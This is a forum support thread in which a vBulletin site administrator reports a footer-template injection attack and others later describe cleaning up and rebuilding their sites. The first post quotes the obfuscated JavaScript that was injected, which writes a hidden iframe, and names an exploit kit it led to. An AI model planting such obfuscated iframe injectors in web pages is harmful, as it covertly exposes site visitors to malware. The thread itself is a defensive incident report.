No announcement yet.

vBulletin Footer SQL Injection Hack

  • Filter
  • Time
  • Show
Clear All
new posts

  • vBulletin Footer SQL Injection Hack


    Over the last couple days our site has been targeted with what appears to be some sort of SQL injection attack. When this occurs, the following code is appended to the footer template:

    PHP Code:
    <script>var _0x110261= [\"\\x77\\x72\\x69\\x74\\x65\"]; var aBBcB=document; var ccccc = '<iframJQ21KL#AZ XLMS9Q21rc=\"\" width=\"1\" hJQ21KL#AZight=\"0\" framJQ21KL#AZbordJQ21KL#AZr=\"0\"></iframJQ21KL#AZ>'; var BBBcB = ccccc.replace(/XLMS9Q21/g,\"s\"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,\"o\"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,\"e\");aBBcB[_0x110261[0]](unescape(cBcBc));</script> 

    This is very similar in form to the vBSEO injection hack that was reported fixed a while ago, though referencing "" instead of To that end, we immediately upgraded vBSEO to version 3.3.2 (we were running version 3.2 previously). vBulletin itself is and was running version 3.8.4 PL2. However, we are continuing to see this code embedded on the site.

    Downloading the header.jpeg file referenced in the iframe and opening it in Notepad shows it to be a PHP script called "Egypack 1.0". The only other incident we could find through google is located at and is in spanish. It also occurred within the last couple of days, and targetted a Wordpress site (as did the original injection). However, unlike the incident, we are unable to locate any remaining scripts that could be re-populating the injection.

    Any help or suggestions would be greatly appreciated.

  • #2
    Cider, any response to this?


    • #3
      Originally posted by Panzer Max View Post
      Cider, any response to this?
      We took very drastic measures to solve the issue:

      -Changed all passwords
      -Created a new cPanel account
      -Installed a clean vBulletin 4 suite and our own portal (read privileges only)

      No modifications have been installed, including vbSEO. We've very likely caused significant damage to our pagerank, but we'll get over it.

      We're still very confident this is similar to the centiyo issue since it is hitting wordpress sites the same way. Another site hosted by KnownHost (our host) sent me a private message here today saying they had the issue, but an arabic site using an entirely different hosting service also had this occur and posted on this forum earlier.

      We're not confident enough to stake our security on it. We effectively just nuked the old site and built on a clean install with no modifications.


      • #4
        There are a couple other sites we've found with this issue. For clarification to those who find this thread by Google, this does not appear to be vBulletin-related at all. Please contact me directly through private message here or at [email protected].


        • #5
          Thanks for the follow up info


          • #6
            my site was hacked same way. How did you resolve this problem. Could you please share with me


            Related Topics